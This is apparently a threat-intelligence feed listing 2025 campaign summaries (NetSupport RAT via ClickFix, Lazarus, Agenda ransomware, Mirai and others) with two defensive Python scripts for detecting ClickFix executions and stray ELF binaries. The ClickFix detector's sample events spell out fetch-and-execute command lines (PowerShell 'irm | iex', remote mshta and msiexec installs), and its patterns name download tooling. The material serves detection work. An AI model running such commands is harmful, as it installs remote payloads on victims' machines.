LATEST THREAT INTELLIGENCE.
Unpacking NetSupport RAT Loaders Delivered via ClickFix
Description: eSentire's Threat Response Unit observed multiple threat groups using NetSupport Manager for malicious purposes throughout 2025. These groups have shifted from fake-update lures to ClickFix as their primary delivery method: victims are socially engineered into pasting a command into the Windows Run prompt, and that command retrieves, extracts, and launches NetSupport. Three distinct groups were identified, each with its own loader and infrastructure, and they are tracked by the licensee names found in their NetSupport builds: EVALUSION, FSHGDREE32/SGI, and XMLCTL. The analysis covers the PowerShell/JSON-based loader, the MSI-based loader, and a PCAP-level look at NetSupport's network traffic. An unpacking utility and a YARA rule are provided to help researchers detect and analyze NetSupport variants.
Created at: 2025-10-24T04:30:26.227000
Updated at: 2025-11-23T04:04:55.572000
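The ClickFix step described above leaves a consistent process-tree shape on the endpoint: explorer.exe (which services the Run prompt) spawns a living-off-the-land binary whose command line downloads and runs something. The following is an added example, not eSentire's unpacking utility or YARA rule, showing one way to hunt for that shape in process-creation telemetry. The event records, the LOLBin list, and the command-line indicator patterns are this example's own assumptions (the records are constructed, not taken from the report).

```python
"""Flag ClickFix-style executions: explorer.exe (Run prompt) launching a
LOLBin with download / hidden-window / encoded / remote-MSI indicators.
Added example; not tooling from the eSentire report."""
import re

# Binaries a pasted Run-prompt command typically invokes (assumed list).
LOLBINS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "msiexec.exe",
    "curl.exe", "certutil.exe", "rundll32.exe", "regsvr32.exe", "bitsadmin.exe",
}

# Command-line indicators and the label reported when each fires (assumed patterns).
INDICATORS = [
    (re.compile(r"\b(irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring|"
                r"downloadfile|wget|curl)\b", re.I), "remote download"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "inline execution"),
    (re.compile(r"-(w|win|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"https?://", re.I), "URL on command line"),
    (re.compile(r"\bmsiexec\b.*\s/i\s+https?://", re.I), "MSI install from URL"),
]

# Constructed process-creation records in a Sysmon Event ID 1-like shape.
# Sample input for this example only; not telemetry from the report.
SAMPLE_EVENTS = [
    {   # ClickFix: pasted PowerShell one-liner that fetches and runs a stager
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "irm https://example.invalid/a.txt | iex"',
    },
    {   # ClickFix: remote HTA pulled by mshta
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta https://example.invalid/v.hta",
    },
    {   # ClickFix: MSI-based loader installed straight from a URL
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": "msiexec /i https://example.invalid/p.msi /qn",
    },
    {   # Benign: user opened PowerShell from the Start menu and ran a cmdlet
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell Get-Process",
    },
    {   # Out of scope for this rule: download launched by an installed updater
        "ParentImage": r"C:\Program Files\Vendor\updater.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd /c curl https://example.invalid/x -o x.msi",
    },
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def clickfix_reasons(event):
    """Return the indicator labels that fire for one event (empty list if none).

    The parent must be explorer.exe (the Run prompt's host) and the child a
    LOLBin; only then is the command line checked for indicators.
    """
    if basename(event["ParentImage"]) != "explorer.exe":
        return []
    if basename(event["Image"]) not in LOLBINS:
        return []
    cmd = event["CommandLine"]
    return [label for pattern, label in INDICATORS if pattern.search(cmd)]


def find_clickfix(events):
    """Return (command line, reasons) for every event that looks like ClickFix."""
    hits = []
    for ev in events:
        reasons = clickfix_reasons(ev)
        if reasons:
            hits.append((ev["CommandLine"], reasons))
    return hits


if __name__ == "__main__":
    for cmd, reasons in find_clickfix(SAMPLE_EVENTS):
        print(f"[ClickFix?] {cmd}\n    indicators: {', '.join(reasons)}")
```

The rule is deliberately narrow: it keys on the Run-prompt parent, so a download kicked off by an installed updater (the last sample record) is not reported by it, and a plain interactive PowerShell launch with no indicators is also ignored. The same pasted command is also recorded under the current user's RunMRU registry key, which is a useful corroborating artifact during triage.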
Gotta fly: Lazarus targets the UAV sector
Description: ESET researchers have uncovered a new instance of Operation DreamJob, a campaign attributed to the North Korea-aligned Lazarus group, targeting European defense companies involved in UAV technology. The attacks align with North Korea's efforts to enhance its drone program, likely aiming to steal proprietary information and manufacturing know-how. The campaign uses social engineering tactics, trojanized open-source projects, and deploys the ScoringMathTea RAT. The attackers' toolset includes various droppers, loaders, and downloaders, with a focus on UAV-related targets. This activity highlights the ongoing threat posed by Lazarus and North Korea's interest in advancing its drone capabilities through cyberespionage.
Created at: 2025-10-23T13:51:03.909000
Updated at: 2025-11-22T13:02:55.206000
Dissecting YouTube's Malware Distribution Network
Description: Check Point Research uncovered a sophisticated malware distribution campaign operating on YouTube, dubbed the YouTube Ghost Network. This network utilizes over 3,000 malicious videos to spread malware, primarily targeting users seeking game cheats and pirated software. The operation involves compromised accounts with specific roles: video uploaders, community posters, and interaction simulators. The network has been active since 2021, with a significant increase in activity in 2025. It mainly distributes infostealer malware, with Lumma and Rhadamanthys being prevalent. The campaign employs various tactics to evade detection, including password-protected archives and frequent updates to payloads and C2 infrastructure. This research highlights the evolving nature of malware distribution methods and the need for enhanced cybersecurity measures.
Created at: 2025-10-23T13:51:01.754000
Updated at: 2025-11-22T13:02:55.206000
Agenda Ransomware Deploys Linux Variant on Windows Systems Through Remote Management Tools and BYOVD Techniques
Description: Agenda ransomware group, also known as Qilin, has been deploying a Linux-based ransomware binary on Windows hosts using legitimate remote management and file transfer tools. This cross-platform execution technique bypasses Windows-centric detections and security solutions. The attack chain includes the use of BYOVD for defense evasion, deployment of multiple SOCKS proxy instances for C&C traffic obfuscation, and targeted theft of backup credentials. Agenda has affected 591 victims across 58 countries since January 2025, primarily targeting organizations in developed markets and high-value industries. The group's sophisticated approach combines legitimate tools, cross-platform execution, and strategic targeting of backup infrastructure, making detection significantly more challenging for organizations.
Created at: 2025-10-23T13:51:01.240000
Updated at: 2025-11-22T13:02:55.206000
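Because the Agenda payload described above is a Linux binary staged on Windows hosts, a Windows-centric scan that keys on PE files will not see it. One format-agnostic check is to look for the ELF magic in the first bytes of files regardless of their extension. The following is an added example, not tooling from the Agenda/Qilin report; the sample file contents are constructed, and the directory-walk helper is this example's own.

```python
"""Hunt for ELF binaries on a Windows host by header, not by file extension.
Added example; not tooling from the Agenda/Qilin report."""
import os
import struct

ELF_MAGIC = b"\x7fELF"
ELF_CLASS = {1: "ELF32", 2: "ELF64"}
ELF_TYPE = {2: "EXEC", 3: "DYN"}                      # ET_EXEC, ET_DYN
ELF_MACHINE = {0x03: "x86", 0x28: "ARM", 0x3E: "x86-64", 0xB7: "AArch64"}


def parse_elf_header(data):
    """Return class/type/machine for an ELF header, or None if the bytes are not ELF.

    Only the first 20 bytes are needed: e_ident (16 bytes) followed by the
    16-bit e_type and e_machine fields, whose byte order is given by EI_DATA.
    """
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        return None
    endian = "<" if data[5] == 1 else ">"           # EI_DATA: 1 = little, 2 = big
    e_type, e_machine = struct.unpack(endian + "HH", data[16:20])
    return {
        "class": ELF_CLASS.get(data[4], f"unknown({data[4]})"),   # EI_CLASS
        "type": ELF_TYPE.get(e_type, f"unknown({e_type})"),
        "machine": ELF_MACHINE.get(e_machine, f"unknown({e_machine:#x})"),
    }


def triage_blobs(blobs):
    """blobs: {path: leading bytes}. Return [(path, header_info)] for ELF files."""
    findings = []
    for path, head in blobs.items():
        info = parse_elf_header(head)
        if info:
            findings.append((path, info))
    return findings


def scan_directory(root):
    """Walk a directory tree and report every file that starts with an ELF header."""
    blobs = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    blobs[path] = fh.read(20)
            except OSError:
                continue                                # locked or unreadable file
    return triage_blobs(blobs)


# Constructed sample contents (not real files): a minimal ELF64 x86-64
# executable header hiding behind a harmless-looking name, and a PE/MZ stub.
SAMPLE_BLOBS = {
    r"C:\Users\Public\update.dat":
        ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8 + struct.pack("<HH", 2, 0x3E),
    r"C:\Users\Public\setup.exe":
        b"MZ\x90\x00" + b"\x00" * 16,
}


if __name__ == "__main__":
    for path, info in triage_blobs(SAMPLE_BLOBS):
        print(f"ELF on Windows host: {path} ({info['class']} {info['type']} {info['machine']})")
```

Run scan_directory against user-writable locations and the staging paths used by the remote management and file transfer tools in your environment; outside of WSL distribution directories, an ELF file on a Windows workstation or server is worth a closer look.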
Mirai Botnet Propagation and Exploitation of CVE-2025-24016
Description: The Mirai botnet keeps spreading as operators reuse its leaked source code and bolt on exploits for newly published vulnerabilities. A CVE assignment, useful as it is, can also draw attackers' attention to a flaw that had gone unnoticed, and public proof-of-concept code written to educate defenders is frequently picked up by attackers instead, which makes prompt patching essential. CVE-2025-24016 affects Wazuh servers running outdated versions (prior to 4.9.1); upgrading to 4.9.1 or later is strongly recommended. The report includes IOCs, Snort rules, and YARA rules for two Mirai-based botnets, detailing their C2 infrastructure, malicious domains, and file hashes.
Created at: 2025-10-23T13:40:08.722000
Updated at: 2025-11-22T13:02:55.206000
Analysis of APT-C-26 (Lazarus) Group's Attack Campaign Using Remote IT Disguise to Deploy Monitoring Software
Description: The report details an attack campaign by APT-C-26 (Lazarus), a highly active APT group targeting various industries worldwide. The group deployed a customized monitoring program with remote desktop control capabilities, likely operated by people posing as remote IT staff who had been placed inside target companies. The malware consists of a registration program, a daemon process, and a DLL that implements the core monitoring functions. It registers a Windows shell extension for persistence and creates a covert remote desktop session. The analysis documents detection-evasion techniques including disabling Windows Defender and manipulating firewall rules. The monitoring component captures screen data, uploads it to a server, and provides remote desktop access. Based on the tooling and tactics observed, the activity is attributed to the Lazarus group.
Created at: 2025-11-21T22:11:40.327000
Updated at: 2025-11-21T22:12:37.479000
New Tools and Techniques of ToddyCat APT
Description: The ToddyCat APT group has evolved its methods to gain covert access to corporate email. The report details their use of PowerShell-based TomBerBil for extracting browser data, TCSectorCopy for copying Outlook OST files, and attempts to steal OAuth tokens from Microsoft 365 processes. These tools allow the attackers to bypass security monitoring and access email data both on-premises and in the cloud. The group's tactics include using SMB to remotely access files, dumping process memory, and searching for access tokens. Detection recommendations are provided for each technique.
Created at: 2025-11-21T14:38:00.696000
Updated at: 2025-11-21T22:07:56.899000
Infrastructure of Interest: Medium Confidence Detection
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous patterns, behavioral analysis of malicious activity, and cross-referenced intelligence from endpoint telemetry and external sources. Use this data to enhance detection rules, block malicious infrastructure, or correlate with existing incident investigations. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:39:42.586000
Updated at: 2025-11-21T20:36:30.443000
Infrastructure of Interest: Medium Confidence InfoStealer
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous patterns, behavioral analysis of malicious activity, and cross-referenced intelligence from endpoint telemetry and external sources. The IOCs included in this pulse are associated with infostealer malware, designed to harvest sensitive data such as credentials, cookies, and financial information from compromised systems. Use this data to enhance detection rules, block malicious infrastructure, or correlate with existing incident investigations involving data theft. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:31:55.617000
Updated at: 2025-11-21T20:35:24.402000
Infrastructure of Interest: Medium Confidence Command And Control
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous patterns, behavioral analysis of malicious activity, and cross-referenced intelligence from endpoint telemetry and external sources. The IOCs included in this pulse are associated with command and control (C2) infrastructure, facilitating malware communication, data exfiltration, and persistent threat actor operations. Use this data to enhance detection rules, block malicious infrastructure, or correlate with existing incident investigations. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:29:37.542000
Updated at: 2025-11-21T20:35:20.285000
